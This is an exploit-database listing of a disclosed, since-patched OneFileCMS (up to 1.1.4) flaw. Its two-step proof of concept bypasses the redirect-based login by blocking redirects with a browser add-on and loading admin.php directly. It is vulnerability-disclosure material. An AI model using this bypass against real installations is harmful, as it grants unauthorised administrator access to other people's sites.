[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OneFileCMS - Failure to Restrict URL Access

Author
Abhi Balakrishnan
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17687
Category
web applications
Date add
13-03-2012
Platform
php
# Exploit Title: OneFileCMS - Failure to Restrict URL Access
|
# Date: 12th March 2012
|
# Author: Abhi M Balakrishnan
|
# Software Link: https://github.com/rocktronica/OneFileCMS/blob/4340be5355b702c771ef03d4b00c74d358443b38/onefilecms.php
|
# Version: upto 1.1.4
|
# Tested on: Apache-2.2.17, PHP-5.2.17, MySQL-5.5.9, Windows 6.2
|
# Vulnerability Status: Fixed on version 1.1.5
|	Developer was very quick in responding to mails and to fix the issue. Bugfix version released within minutes after the notification. Great work.!!!
|	Commit: https://github.com/rocktronica/OneFileCMS/commit/a4e36213d9fe3efccc2f6730d29fd2a05c57594b
|
# Vulnerability: Failure to Restrict URL Access, since the redirection mechanism can be bypassed easily
|
# Exploit:
|
|	Step 1:	Create a rule in No-Redirect Add-on: ^http://example.com/path/
|	Step 2:	Access http://example.com/path/admin.php
|
# PoC Video: http://www.youtube.com/watch?v=0lPz24Z7Q_4



#  0day.today [2024-11-15]  #